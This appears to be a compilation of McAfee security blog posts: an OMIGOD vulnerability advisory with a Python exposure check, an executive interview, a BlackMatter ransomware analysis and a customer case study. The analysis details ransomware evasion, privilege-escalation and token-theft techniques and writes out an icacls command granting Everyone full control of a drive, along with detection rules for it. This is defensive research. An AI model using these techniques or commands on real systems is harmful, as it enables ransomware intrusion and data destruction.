Solutions like User and Entity Behavior Analytics (UEBA) and Endpoint Detection and Response (EDR) can also play a significant role in building the deception infrastructure. For instance, UEBA can baseline user behavior and monitor access to credential stores on the system, and UEBA/EDR can raise a red flag on the injection of forged Kerberos tickets into memory. Integrated with the SIEM, this provides user-level visibility that is crucial in mitigating credential theft attacks.
The post Detecting Credential Stealing Attacks Through Active In-Network Defense appeared first on McAfee Blog.
This month Microsoft released patches for 86 vulnerabilities. While many of these vulnerabilities are important and should be patched as soon as possible, there is one critical vulnerability that McAfee Enterprise wants to immediately bring to your attention due to the simplicity of what is required to exploit, and evidence that possible exploitation is already being attempted.
The flaws, collectively called OMIGOD, impact a software agent called Open Management Infrastructure (OMI) that is automatically deployed in many Azure services:
CVE-2021-38647 (CVSS score: 9.8) – Open Management Infrastructure Remote Code Execution Vulnerability
CVE-2021-38648 (CVSS score: 7.8) – Open Management Infrastructure Elevation of Privilege Vulnerability
CVE-2021-38645 (CVSS score: 7.8) – Open Management Infrastructure Elevation of Privilege Vulnerability
CVE-2021-38649 (CVSS score: 7.0) – Open Management Infrastructure Elevation of Privilege Vulnerability
Azure customers on Linux machines, including users of Azure Automation, Azure Automatic Update, Azure Operations Management Suite (OMS), Azure Log Analytics, Azure Configuration Management, and Azure Diagnostics, are at risk of potential exploitation. OMI can also be installed outside of Azure on any on-premises Linux system.
The remote code execution flaw is extremely simple to exploit: all that is required is to remove the authentication header from a request, and root-level access is available remotely on every exposed machine. With this vulnerability attackers can obtain initial access to the target Azure environment and then move laterally within it.
Campaign: Multiple CVE’s Affecting the Azure OMI Agent Dubbed OMIGOD
Source: MVISION Insights
Multiple security researchers shared proof of concept attacks on the exploitation of the vulnerabilities and, soon thereafter, actors mimicked the efforts and have recently been seen actively exploiting CVE-2021-38647 via botnet activities.
Background on the Mirai Botnet and related campaigns
Source: MVISION Insights
One such botnet is Mirai, which actively scans for vulnerabilities, including those identified as OMIGOD, that allow its operators to infect a system and spread to connected devices. When the Mirai botnet exploits a vulnerable machine, the operators drop one of the Mirai DDoS botnet versions and close port 5986 to the internet to prevent other attackers from exploiting the same box. Reports of successful OMIGOD exploitation also describe cryptominers being deployed on the impacted systems.
The OMI agent has no auto-update mechanism of its own; a manual upgrade of the agent is required to prevent exploitation. Microsoft has released a patched OMI version (1.6.8.1); the steps suggested by Microsoft are provided at the link below.
CVE-2021-38647 – Open Management Infrastructure Remote Code Execution Vulnerability
McAfee Enterprise will continue to update the following KB document with product coverage of CVE-2021-38647; please subscribe to the KB to be notified of updates.
McAfee Enterprise coverage for CVE-2021-38647 Remote Code Execution Vulnerability
To identify vulnerable systems in your environment, McAfee Enterprise recommends scanning for systems listening on port 5986, the port typically used by the OMI agent. Industry intelligence from the Wiz Research group also notes vulnerable systems listening on the non-default ports 5985 and 1270. Note that on Windows hosts 5985 and 5986 are the WinRM ports, so confirm that the listening process is the OMI agent (omiengine) before acting on a port sweep alone. It is recommended to limit network access to those ports immediately to protect against the RCE vulnerability.
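The two checks above, the installed OMI version against the fixed release 1.6.8.1 and whether the OMI ports are listening beyond loopback, combined into one host check. This is an added example, not part of the original post: it parses the kind of output an operator would collect with ss -ltnp and dpkg -s omi (or rpm -q omi); the ss and dpkg outputs embedded below are constructed, not captured from a real host.

```python
"""Check a Linux host for exposed or unpatched OMI (OMIGOD, CVE-2021-38647).

Added example, not from the original post. SAMPLE_SS and SAMPLE_DPKG are
constructed stand-ins for real `ss -ltnp` and `dpkg -s omi` output.
"""
import re

FIXED_VERSION = (1, 6, 8, 1)      # first OMI release carrying the fix
OMI_PORTS = {5986, 5985, 1270}    # default port plus observed non-default ports

SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      50     0.0.0.0:5986        0.0.0.0:*         users:(("omiengine",pid=1423,fd=7))
LISTEN 0      50     127.0.0.1:1270      0.0.0.0:*         users:(("omiengine",pid=1423,fd=8))
LISTEN 0      128    [::]:5985           [::]:*            users:(("omiengine",pid=1423,fd=9))
"""
SAMPLE_DPKG = "Package: omi\nStatus: install ok installed\nVersion: 1.6.8.0\n"


def parse_version(text):
    """Turn '1.6.8.0', or a dpkg/rpm block containing a Version: line, into a tuple."""
    m = re.search(r"(\d+(?:\.\d+)+)", text)
    if not m:
        raise ValueError("no version string found")
    return tuple(int(p) for p in m.group(1).split("."))


def omi_is_vulnerable(version_text):
    """Anything below the fixed release is affected; tuple comparison keeps
    1.6.8.0 < 1.6.8.1 < 1.6.10.0 correct where string comparison would not."""
    return parse_version(version_text) < FIXED_VERSION


_LISTEN = re.compile(r"^LISTEN\s+\d+\s+\d+\s+(\S+):(\d+)\s", re.M)


def omi_listeners(ss_output):
    """Return [(address, port, reachable_beyond_loopback)] for OMI ports."""
    found = []
    for addr, port in _LISTEN.findall(ss_output):
        port = int(port)
        if port in OMI_PORTS:
            loopback = addr in ("127.0.0.1", "[::1]")
            found.append((addr, port, not loopback))
    return found


def assess(ss_output, pkg_output):
    """Combine both signals into a per-host verdict a scanner could record."""
    unpatched = omi_is_vulnerable(pkg_output)
    exposed = sorted(port for _, port, reachable in omi_listeners(ss_output) if reachable)
    if unpatched and exposed:
        action = "patch and firewall now"
    elif unpatched:
        action = "patch"
    else:
        action = "ok"
    return {"unpatched": unpatched, "exposed_ports": exposed, "action": action}


if __name__ == "__main__":
    print(assess(SAMPLE_SS, SAMPLE_DPKG))
```

The loopback-only listener on 1270 is deliberately not counted as exposed: it is still worth patching, but it is not reachable by the internet-scanning botnets described above.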
MVISION Insights provides regularly updated threat intelligence for the ongoing attempts to exploit OMIGOD. The “Multiple CVE’s Affecting the Azure OMI Agent Dubbed OMIGOD” campaign will have up to date Global Prevalence, IOCs, and MITRE techniques being observed in the wild. The IOCs within MVISION Insights can be utilized by the Real-time Search function of MVISION Endpoint Detection & Response (EDR) to proactively search your entire Linux endpoint environment for detection.
Global Prevalence of OMIGOD Exploitation Source: MVISION Insights
Indicators of Compromise related to exploitation of OMIGOD Source: MVISION Insights
The McAfee ENS Firewall Rules will allow for the creation of custom rules to block specific ports until the OMI agent can be updated to the resolved version; please see the below screenshot for a sample rule to block the ports associated with the OMI agent.
Creation of Block Rule for OMI Agent Ports in McAfee ENS Firewall
The Real-time Search feature in MVISION EDR will allow you to search your entire Linux environment using several different parameters to identify systems that could be potential targets.
The below pre-built queries can be executed to locate systems listening on the noted ports for the OMI Agent and to verify the version of the OMI agent installed on your endpoint.
Processes and CurrentFlow and HostInfo hostname where Processes name equals omiengine
Software and HostInfo hostname where Software displayname contains om
Locating Installed Software Versions of OMI on Linux endpoints in MVISION EDR
Monitoring the traffic and user information of OMI in MVISION EDR
Another method to identify vulnerable systems in your cloud infrastructure is to run an on-demand vulnerability scan and create security configuration audits with MVISION Cloud Native Application Protection Platform (CNAPP). Below are several examples of using the CWPP and CSPM features to locate vulnerable systems by CVE number and to detect usage of the "root" account in Microsoft Azure.
Running Vulnerability Scans to Identify Vulnerable Systems by CVE
Setting Security Configuration Audits to be alerted of Root Access in Microsoft Azure
The post McAfee Enterprise Defender Blog | OMIGOD Vulnerability Opening the Door to Mirai Botnet appeared first on McAfee Blog.
Welcome back to our executive blog series, where I chat with some of the pivotal players behind McAfee Enterprise and the Advanced Threat Research Team to hear their takes on today’s security trends, challenges, and opportunities for companies across the globe.
Q: What got you interested in technology and threat research?
As a little kid, I was always fascinated by technology. I would wrench open devices to study the inner workings, and try to assemble again. At age 12 I worked for three years to assemble my first computer-setup: a Commodore 64, disk-drive, and printer followed by an Amiga with modem. From that point, it was a journey from sysadmin to ethical hacking into specializing in digital forensics and joining FoundStone to setup their EMEA Incident Response team. As I witnessed multiple malware incidents and later some of the largest cyber-attacks ever, I got fascinated by all the mechanics around threat research. From this, I made a move to lead and envision new ways (threat) research can assist both responders and customers.
Q: If you could relive any moment of your life, which would it be?
Good question. There are so many moments to be thankful for that I cannot choose one but will mention a few that might sound obvious: My baptism, marrying my wife, and the birth of my kids.
Q: What are some of the trends you are currently noticing across the threat landscape?
Of course, we still have ransomware around as an ongoing issue that keeps evolving and impacting not only companies around the world, but also our lives more and more when fuel is not available, supermarkets are closed, and delivery of goods cannot be executed. Secondly, I would say the volume and number of attacks that happen have increased dramatically over the years. The moment a vulnerability is announced, within days, a proof-of-concept is available and within a week it is used by adversaries (either cybercrime or nation-state motivated). The feedback from our customers has been tremendously positive.
Q: How do you react to constantly changing threats in the market?
The only way to respond to the constant changing threats is to be flexible and willing to change. What works today might not work tomorrow, which should be part of your strategy when it comes to threat hunting, threat detection, and protection. My team is eager to learn and we are committed to protect our customers, innovate new research techniques, and adapt that into our technology.
The post Executive Spotlight: Q&A with Lead Scientist & Sr. Principal Engineer, Christiaan Beek appeared first on McAfee Blog.
BlackMatter is a new ransomware threat discovered at the end of July 2021.
This malware started with a strong wave of attacks and with advertising from its developers claiming that they took the best parts of other malware, such as GandCrab, LockBit and DarkSide, while also claiming to be a new group of developers. We at McAfee Enterprise Advanced Threat Research (ATR) have serious doubts about this last statement, as analysis shows the malware has a great deal in common with DarkSide, the malware associated with the Colonial Pipeline attack that caught the attention of the US government and law enforcement agencies around the world.
The main goal of BlackMatter is to encrypt files in the infected computer and demand a ransom for decrypting them. As with previous ransomware, the operators steal files and private information from compromised servers and request an additional ransom to not publish on the internet.
McAfee’s EPP solution covers BlackMatter ransomware with an array of prevention and detection techniques.
ENS ATP provides behavioral content focused on proactively detecting the threat while also delivering known IoCs for both online and offline detection. For DAT-based detections, the family is reported as Ransom-BlackMatter!<hash>. ENS ATP adds two further layers of protection: JTI rules that provide attack surface reduction for generic ransomware behaviors, and RealProtect (static and dynamic) with ML models targeting ransomware threats.
Updates on indicators are pushed through GTI, and customers of Insights will find a threat-profile on this ransomware family that is updated when new and relevant information becomes available.
BlackMatter is typically seen as an EXE program and, in special cases, as a DLL (Dynamic Link Library) for Windows. Linux machines can also be affected by dedicated versions, but this report covers only the Windows version.
This report will focus on version 1.2 of BlackMatter while also noting the important changes in the current version, 2.0.
BlackMatter is written in C++ and is 67 KB in size.
FIGURE 1. Information about the malware
The compile date of this sample is 23 July 2021. While these timestamps can be altered, we believe it is genuine: version 1.9 has a compile time of 12 August 2021 and the latest version, 2.0, is dated four days later, 16 August 2021. It is clear that the developers are actively improving the code and making detection and analysis harder.
The first action performed by BlackMatter is to locate the Windows modules it needs so that it can resolve the API functions it will call later.
FIGURE 2. BlackMatter searching for functions
BlackMatter uses some tricks to make analysis harder and to evade debuggers. Instead of searching for module names in clear text, it compares against hashes precalculated with a ROT13-based routine. The modules needed are "kernel32.dll" and "ntdll.dll"; from each it resolves the functions used to allocate memory on the process heap. The APIs are found by walking from the PEB (Process Environment Block) to the module's EAT (Export Address Table) and enumerating all exported function names. For each name it calculates the custom hash and compares it against the target hashes.
FIGURE 3. BlackMatter detecting a debugger
At this point BlackMatter runs a small debugger check: after reserving heap memory it inspects the two DWORDs that follow the allocation, looking for the pattern 0xABABABAB. When a process is started under a debugger, Windows creates its heap with tail checking enabled (a heap flag that is set by default in that case), and every allocation is then followed by that tail pattern; in a normally started process it is absent. If the pattern is present, the malware deliberately does not store the pointer to the reserved memory, so the variables keep a null pointer and the function addresses obtained earlier are effectively destroyed. The malware then crashes instead of continuing to run under the debugger.
FIGURE 4. Preparing the protection stub function
After this check it builds a small stub in the reserved memory. The stub is simple but effective at hindering analysis, because it must be executed to see which function is actually called. This procedure is repeated for every function needed; the hashes are hardcoded in the middle of the ".text" section in small data structures, and the end of each structure is marked by the value 0xCCCCCCCC.
FIGURE 5. Hashes of the functions needed
This behavior highlights that the BlackMatter developers know some tricks to make analysis harder, though it is simple to defeat both by patching the binary.
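The resolution process described above (walk a module's export names, hash each one, match against a hardcoded table terminated by 0xCCCCCCCC), written as a Python helper of the kind an analyst uses to label the hashes in a disassembly. This is an added example, not code from the sample or from the McAfee report: the post says the hashes come from a ROT13-based routine but does not give the exact algorithm or constants, so a generic ROR13 rolling hash (the usual shape of this technique) is used as an assumed stand-in, to be swapped for the recovered routine once it has been reverse engineered. The export-name list and the hash table below are constructed so the example is self-consistent.

```python
"""Resolve hashed API names of the kind BlackMatter stores instead of strings.

Added example, not the sample's code. The hash routine is an ASSUMED ROR13
rolling hash; replace api_hash() with the routine recovered from the binary.
"""
import struct

MASK32 = 0xFFFFFFFF
TERMINATOR = 0xCCCCCCCC   # end-of-table marker described in the analysis


def ror32(value, bits):
    """Rotate a 32-bit value right by `bits`."""
    return ((value >> bits) | (value << (32 - bits))) & MASK32


def api_hash(name, rot=13):
    """Assumed hash: h = ROR(h, 13) + byte, over the ASCII export name."""
    h = 0
    for b in name.encode("ascii"):
        h = (ror32(h, rot) + b) & MASK32
    return h


def build_lookup(exports):
    """Precompute hash -> name over a module's export name table, which is
    what both the malware and the analyst walk (the malware at runtime via
    PEB -> module base -> EAT; the analyst from the DLL on disk)."""
    return {api_hash(n): n for n in exports}


def parse_hash_table(blob):
    """Read little-endian DWORDs from the data blob until the terminator."""
    out = []
    usable = blob[: len(blob) - len(blob) % 4]      # iter_unpack needs a multiple of 4
    for (h,) in struct.iter_unpack("<I", usable):
        if h == TERMINATOR:
            break
        out.append(h)
    return out


def resolve(blob, exports):
    """Label every hash in the table, or mark it unknown if no export matches
    (typically meaning a different module, or a wrong hash routine)."""
    lookup = build_lookup(exports)
    return [(h, lookup.get(h, "<unknown>")) for h in parse_hash_table(blob)]


# Constructed export list (a subset of real kernel32/ntdll export names) and a
# hash table built with the assumed routine, followed by unrelated bytes to
# show that parsing stops at the terminator.
EXPORTS = ["HeapAlloc", "HeapFree", "GetProcessHeap", "VirtualAlloc",
           "RtlAllocateHeap", "NtSetInformationThread", "CreateFileW"]
HASH_TABLE = struct.pack("<4I", api_hash("GetProcessHeap"), api_hash("RtlAllocateHeap"),
                         api_hash("NtSetInformationThread"), TERMINATOR) + b"\x90\x90"

if __name__ == "__main__":
    for h, name in resolve(HASH_TABLE, EXPORTS):
        print(f"{h:08x} -> {name}")
```

When the recovered routine is plugged in, the same lookup can be run over the full export tables of kernel32.dll and ntdll.dll to annotate every hash structure in the ".text" section at once.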
After this, the ransomware uses another trick against debuggers: it calls "ZwSetInformationThread" with the class argument 0x11 (ThreadHideFromDebugger), which hides the calling thread from debuggers.
If the call succeeds while a debugger is attached, the debugging session ends immediately. This code runs later, in the threads used to encrypt files.
FIGURE 6. Another way to detect a debugger
The next action is to check whether the user that launched the process belongs to the local Administrators group, using the function "SHTestTokenMembership". If so, the code continues normally; otherwise it reads the operating system version from the PEB (avoiding API functions whose results can be altered) and, where available, opens the process and inspects its token to see whether it belongs to the Administrators group.
FIGURE 7. BlackMatter checking if it has administrator rights
If the user does not belong to the Administrators group, BlackMatter uses a clever trick to escalate privileges.
First it prepares the string "dllhost.exe" and enumerates all loaded modules. For each module it reads the header field that records the base address at which the module is loaded (for example, kernel32.dll at 0x7fff0000) and compares it with its own base address. When they match, the entry is the malware's own image, and it overwrites the module name, path and command-line path in the PEB with "dllhost.exe" and the SYSTEM32 folder, where the legitimate "dllhost.exe" lives, in order to mislead the user.
FIGURE 8. Decryption of the string “dllhost.exe”
The process name becomes "dllhost.exe" and the path becomes the system directory of the victim machine. Besides leaving the process name unchanged in Task Manager (which does not read the PEB), this trick can make a debugger "think" that a different binary has been loaded and drop all breakpoints, depending on the debugger used.
FIGURE 9. Changing the name and path in the PEB
The second action is to use a public COM (Component Object Model) based exploit to try to elevate privileges, after which it terminates its own instance with the "TerminateProcess" function.
For this enumeration the module uses an undocumented function from NTDLL.DLL, "LoadedModulesLdrCallback", which lets the caller register a callback that receives each module's details and can inspect the PEB. Inside the callback the malware sets the new Unicode strings using "RtlInitUnicodeString": the path to "dllhost.exe" in the system folder, and "dllhost.exe" as the image name.
The UAC (User Account Control) bypass used, which is public, relies on the CMSTPLUA COM interface and the COM Elevation Moniker.
If it already has administrator rights, or the exploit succeeds, it goes on to build the new extension that will be appended to encrypted files. For this it reads the "MachineGuid" value under the Cryptography key in HKEY_LOCAL_MACHINE (HKLM\SOFTWARE\Microsoft\Cryptography).
This value exists on all versions of Windows and is unique per machine; BlackMatter runs it through a custom hash to produce the final nine-character extension string.
FIGURE 10. Creating the new extension for the encrypted files
Next, the malware will create the ransom note name and calculate the integrity hash of it. The ransom note text is stored encrypted in the malware data. Usually the ransom note name is “%s.README.txt”, where the wildcard is filled with the new extension generated previously.
The next step is to get privileges that will be needed later; BlackMatter tries to get many privileges:
· SE_BACKUP_PRIVILEGE
· SE_DEBUG_PRIVILEGE
· SE_IMPERSONATE_PRIVILEGE
· SE_INC_BASE_PRIORITY_PRIVILEGE
· SE_INCREASE_QUOTA_PRIVILEGE
· SE_INC_WORKING_SET_PRIVILEGE
· SE_MANAGE_VOLUME_PRIVILEGE
· SE_PROF_SINGLE_PROCESS_PRIVILEGE
· SE_RESTORE_PRIVILEGE
· SE_SECURITY_PRIVILEGE
· SE_SYSTEM_PROFILE_PRIVILEGE
· SE_TAKE_OWNERSHIP_PRIVILEGE
· SE_SHUTDOWN_PRIVILEGE
FIGURE 11. Setting special privileges
After obtaining the privileges it checks whether it is running as SYSTEM by inspecting its own process token. If so, it obtains the token of the interactively logged-on user with "WTSQueryUserToken", a function that can only be called by a process holding "SeTcbPrivilege", which by default only SYSTEM has.
FIGURE 12. Obtaining the token of the logged on user
After getting the token of the logged on user the malware will open the Windows station and desktop.
If it does not have SYSTEM privileges, it enumerates all processes in the system and tries to duplicate the token of "explorer.exe" (the name is matched using a hardcoded hash). If that duplicated token has administrator rights it continues normally.
Otherwise it checks the operating system version and whether the process is running as 32-bit or 64-bit, using the function "ZwQueryInformationProcess" with the class 0x1A (ProcessWow64Information).
FIGURE 13. Checking if the operating system is 32- or 64-bits
On a 32-bit system it decrypts a small shellcode and injects it, using the typical "CreateRemoteThread" function, into a process selected by enumeration; the shellcode obtains that process's token and elevates privileges.
On a 64-bit system it decrypts two different shellcodes and executes the first one, passing the second shellcode as an argument.
FIGURE 14. BlackMatter preparing shellcodes to steal system token
These shellcodes will allow BlackMatter to elevate privileges in a clean way.
It is important to understand that, to obtain the SYSTEM token, BlackMatter enumerates processes looking for "svchost.exe", but it does not rely on the name alone: it also checks that the candidate process holds "SeTcbPrivilege". Since by default only SYSTEM has that privilege (and it cannot be removed from that account), a process holding it must be running as SYSTEM, which makes it the perfect target for the shellcodes that steal its token so it can be duplicated and assigned to BlackMatter.
FIGURE 15. Checking if the target process is SYSTEM
After this it will decrypt the configuration that it has embedded in one section. BlackMatter has this configuration encrypted and encoded in base64.
This configuration has a remarkably similar structure to Darkside, offering another clear hint that the developers are one and the same, despite their claims to the contrary.
After decryption, the configuration can get this information:
After parsing the configuration, BlackMatter checks whether it needs to log on with credentials stored in the configuration. If so, it calls the function "LogonUser" with the stored user information, which takes the form "test@enterprise.com:12345", where "test" is the user, "enterprise.com" the domain and "12345" the password.
The next action will be to check with the flag to see if a mutex needs to be created to avoid having multiple instances.
This mutex is unique per machine and is derived from the "MachineGuid" value under the "Cryptography" registry key. If the mutex already exists, the malware exits.
A mutex-based vaccine can sometimes be useful, but not in this case: the developers change the algorithm between versions and only need to set the flag to false to skip creating the mutex at all.
FIGURE 16. Creation of the mutex to avoid multiple instances
Next, it checks whether it needs to send information to the C2. If so (usually, but not always), it collects information about the victim machine, such as the username, computer name and hard disk sizes, along with other details that tell the malware operators how many machines are infected.
This information is base64-encoded and encrypted with AES using the key from the configuration.
FIGURE 17. Encrypted information sent to the C2
The C2 addresses come from the configuration (not all samples contain them; in those samples the send flag is false). The malware chooses between plain HTTP and SSL/TLS by inspecting the "http" prefix of the address string.
FIGURE 18. Get information of the victim machine and user
The information is prepared in some strings decrypted from the malware and sent in a POST message.
FIGURE 19. Choose to send by HTTP or HTTPS
The message also contains randomly generated filler values intended to defeat simple checks and bury the real data in garbage.
The C2 replies with garbage data as well, but the malware checks whether the reply starts with "{" and ends with "}"; if it does, the transmission is considered successful and the information is not sent to any other C2.
FIGURE 20. Checking for a reply from the C2 after sending
BlackMatter is a multithread application and the procedure to send data to the C2 is done by a secondary thread.
After that, BlackMatter enumerates all FIXED and REMOVABLE drives and empties the recycle bin on each drive of the right type that has one. One difference from DarkSide is that DarkSide has a configuration flag for this behavior while BlackMatter does not.
The next action is to delete the shadow copies via COM, rather than through the usual shadow copy management programs, to avoid detection. Here too DarkSide differs, as it has a flag for this purpose.
FIGURE 21. Destruction of the shadow volumes using COM
BlackMatter will check another flag and will enumerate all services based on one list in the configuration and will stop target services and delete them.
This behavior is the same as DarkSide.
FIGURE 22. Stopping services and deleting them
Processes will be checked and terminated as with DarkSide, based on other configuration flags.
After terminating the processes, BlackMatter prevents the machine from going to sleep or hibernating while it is encrypting files (in case someone is using the computer), by calling the function "ZwSetThreadExecutionState".
FIGURE 23. Preventing the machine being suspended or hibernated
The next action is to enumerate all drives, fixed and network, and create threads to encrypt the files. BlackMatter encrypts part of each file with Salsa20 and appends a new block at the end of the file containing the Salsa20 keys, protected with the RSA key embedded in the configuration. This makes BlackMatter slower than many other ransomware families.
After encryption it sends the C2 a summary of the process: how many files were encrypted, how many failed, and so on. This is sent in the manner described previously, but only if the configuration flag is set.
FIGURE 24. Release of the mutex
If a mutex was created, it is released at this point. Next it checks how the machine was booted using the function "GetSystemMetrics". If it booted in Safe Mode, BlackMatter sets registry keys for persistence on the next reboot and then attacks the system, changing the desktop wallpaper.
FIGURE 25. Determining whether the system boots in safe mode or normal mode
It also disables the safe boot options on the machine and reboots it (one of the reasons it needs the shutdown privilege).
To ensure it can launch in Safe Mode, the persistence value holding the path of the malware is written with a leading '*', which Windows treats as an instruction to run the entry even in Safe Mode.
FIGURE 26. Setting the persistence registry key
If the machine starts in the normal way, it will change the desktop wallpaper with an alternative generated in runtime with some text about the ransom note.
FIGURE 27. BlackMatter makes the new wallpaper in runtime
The new versions have some differences compared with versions 1.2 to 1.6:
Additional changes in version 2.0:
These changes suggest the developers are active on social media, with an interest in malware and security researchers.
Unlike some ransomware we have seen in the past, such as GandCrab, BlackMatter has good code, but it does have some design flaws that can be used in some cases to prevent the malware from encrypting files.
This vaccine is not intended to be used in the normal way, rather only in special cases as, while it works, other programs can be affected (we obviously cannot test all third party programs but potential issues are likely to include data corruption and unpredictable behavior), and the fix is not permanent.
Steps to make the vaccine (proceed at your own risk):
At this point BlackMatter cannot affect the machine: it needs the registry key to build the ransom extension and, more importantly, when it cannot build it the function returns WITHOUT decrypting the configuration, which is also required. It will still empty the recycle bin and delete the shadow copies, but then it finishes, because it has no behavior to carry out, no RSA key to protect the files and nothing to send to the C2, as the flags were never read from the configuration (and their default values are all false).
Though the behavior of other programs may be unpredictable, the vaccine is easy to make, and the system will boot, showing that the BlackMatter programmers made a mistake in the design of the code.
This vaccine works for all versions, including 2.0.
The sample uses the following MITRE ATT&CK techniques:
Technique ID | Technique Description | Observable |
T1134 | Access Token Manipulation | BlackMatter accesses and manipulates different process tokens. |
T1486 | Data Encrypted for Impact | BlackMatter encrypts files using a custom Salsa20 implementation, with the keys protected by RSA. |
T1083 | File and Directory Discovery | BlackMatter uses native functions to enumerate files and directories searching for targets to encrypt. |
T1222.001 | Windows File and Directory Permissions Modification | BlackMatter executes the command icacls "<DriveLetter>:\*" /grant Everyone:F /T /C /Q to grant full access to the drive. |
T1562.001 | Disable or Modify Tools | BlackMatter stops services related to endpoint security software. |
T1106 | Native API | BlackMatter uses native API functions throughout its code. |
T1057 | Process Discovery | BlackMatter enumerates all processes to discover security programs and terminate them. |
T1489 | Service Stop | BlackMatter stops services. |
T1497.001 | Virtualization/Sandbox Evasion: System Checks | BlackMatter tries to detect debuggers by checking the tail bytes of memory reserved on the heap. |
T1135 | Network Share Discovery | BlackMatter attempts to discover network shares by building a UNC path in the following format for each drive letter from A to Z: \\<IP>\<drive letter>$ |
T1082 | System Information Discovery | BlackMatter uses functions to retrieve information about the target system. |
T1592 | Gather Victim Host Information | BlackMatter retrieves information about the user and machine. |
T1078 | Valid Accounts | BlackMatter uses valid accounts from its configuration to log on to the victim network. |
T1547 | Boot or Logon Autostart Execution | BlackMatter installs persistence in the registry. |
T1012 | Query Registry | BlackMatter queries the registry for information. |
T1018 | Remote System Discovery | BlackMatter enumerates remote machines in the domain. |
T1112 | Modify Registry | BlackMatter changes registry keys and values and sets new ones. |
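Three of the observables in the table above (the icacls command granting Everyone full control on a drive root, the Safe Mode autorun entry written with a leading asterisk, and the A$ to Z$ admin-share walk) turned into detection rules over endpoint telemetry. This is an added example, not part of the McAfee report: the event records are constructed to resemble Sysmon process and registry events and Windows Security 5145 share-access events, and the field names are assumptions about your own pipeline.

```python
"""Detect three BlackMatter observables in constructed endpoint telemetry.

Added example, not from the McAfee report. Event records and field names
are constructed assumptions; adapt them to your SIEM's schema.
"""
import re
from collections import defaultdict

# Constructed sample events: two process creations, two registry writes, and a
# burst of admin-share connections from one source host to a file server.
EVENTS = [
    {"type": "process", "host": "WS-07", "image": r"C:\Windows\System32\icacls.exe",
     "cmdline": r'icacls "D:\*" /grant Everyone:F /T /C /Q'},
    {"type": "process", "host": "WS-07", "image": r"C:\Windows\System32\icacls.exe",
     "cmdline": r'icacls "C:\Users\bob\proj" /grant bob:(OI)(CI)M'},
    {"type": "registry", "host": "WS-07",
     "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
     "value": "*updater", "data": r"C:\Users\bob\AppData\Local\Temp\dllhost.exe"},
    {"type": "registry", "host": "WS-07",
     "key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value": "OneDrive", "data": r"C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe"},
] + [
    {"type": "share", "host": "FS01", "src": "10.0.5.23", "share": f"\\\\10.0.6.10\\{c}$"}
    for c in "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
] + [
    {"type": "share", "host": "FS01", "src": "10.0.5.40", "share": r"\\10.0.6.10\C$"},
]

# T1222.001: icacls granting Everyone full control recursively on a drive root.
ICACLS_RULE = re.compile(r'icacls\s+"?[A-Z]:\\\*"?\s+/grant\s+Everyone:\s*F\b.*\s/T\b', re.I)
# Safe Mode persistence: Windows runs a Run/RunOnce entry in Safe Mode when the
# value name carries a leading '*'; some collectors log name and data merged,
# so both fields are checked.
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.I)
# T1135: UNC admin-share probe of the form \\<IP>\<letter>$
ADMIN_SHARE = re.compile(r"^\\\\[^\\]+\\([A-Z])\$$", re.I)
SHARE_WALK_THRESHOLD = 8   # distinct drive-letter shares from one source host


def detect(events):
    """Return (technique, subject, detail) tuples for every rule that fires."""
    alerts = []
    walks = defaultdict(set)
    for e in events:
        if e["type"] == "process" and ICACLS_RULE.search(e["cmdline"]):
            alerts.append(("T1222.001", e["host"], e["cmdline"]))
        elif (e["type"] == "registry" and RUN_KEY.search(e["key"])
              and (e["value"].startswith("*") or e["data"].startswith("*"))):
            alerts.append(("T1547 safe-mode autorun", e["host"], f'{e["value"]}={e["data"]}'))
        elif e["type"] == "share":
            m = ADMIN_SHARE.match(e["share"])
            if m:
                walks[e["src"]].add(m.group(1).upper())
    # A legitimate admin touches one or two admin shares; walking A$..Z$ is a scan.
    for src, letters in walks.items():
        if len(letters) >= SHARE_WALK_THRESHOLD:
            alerts.append(("T1135", src, f"{len(letters)} distinct admin shares probed"))
    return alerts


if __name__ == "__main__":
    for technique, subject, detail in detect(EVENTS):
        print(f"{technique:<26} {subject:<12} {detail}")
```

The share-walk rule is stateful on purpose: a single \\<IP>\C$ connection is normal administration, so the detail that matters is the number of distinct drive letters one source tries against one target.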
BlackMatter is a new threat in the ransomware field and its developers know full well how to use it to attack their targets. The coding style is remarkably similar to DarkSide and, in our opinion, the people behind it are either the same or have a very close relationship.
BlackMatter shares a lot of ideas, and to some degree code, with DarkSide:
It is important to keep your McAfee Enterprise products updated to the latest detections and avoid insecure remote desktop connections, maintain secure passwords that are changed on a regular basis, take precautions against phishing emails, and do not connect unnecessary devices to the enterprise network.
Despite some effective coding, mistakes have been made by the developers, allowing the program to be read, and a vaccine to be created, though we will stress again that it can affect other programs and is not a permanent solution and should be employed only if you accept the risks associated with it.
The post BlackMatter Ransomware Analysis; The Dark Side Returns appeared first on McAfee Blog.
Hyper-growth and a determination to stand above the crowd compelled a popular Eastern European telecom to upgrade its trusty McAfee Enterprise security infrastructure, which they relied on for many years to protect their 8,000 corporate endpoints. Competitive pressure to keep costs low and cybercriminals at bay for both their internal users and their customers spurred the mobile and fixed telephony company to enhance their existing security architecture with the latest endpoint and cloud-based protections from McAfee Enterprise.
The integrated McAfee Enterprise approach—with ePolicy Orchestrator (ePO) at the helm as the single-pane-of-glass management hub—enabled the security architect to build out a strong security foundation, with McAfee Enterprise endpoint and data protection solutions and Microsoft Defender as the mainstays of the telecom’s line of defense.
With ransomware and other advanced threats grabbing headlines, the telecom company felt a pressing need to upgrade its McAfee Enterprise infrastructure and expand its on-premises endpoint protection to cloud-based McAfee Enterprise Endpoint Security. The organization also added MVISION Endpoint Threat Detection and Response (MVISION® EDR) and deployed two McAfee Enterprise Advanced Threat Defense appliances for dynamic and static sandboxing. These deployments were easily integrated into the telecom’s existing security architecture—with all solutions managed by McAfee Enterprise ePO software.
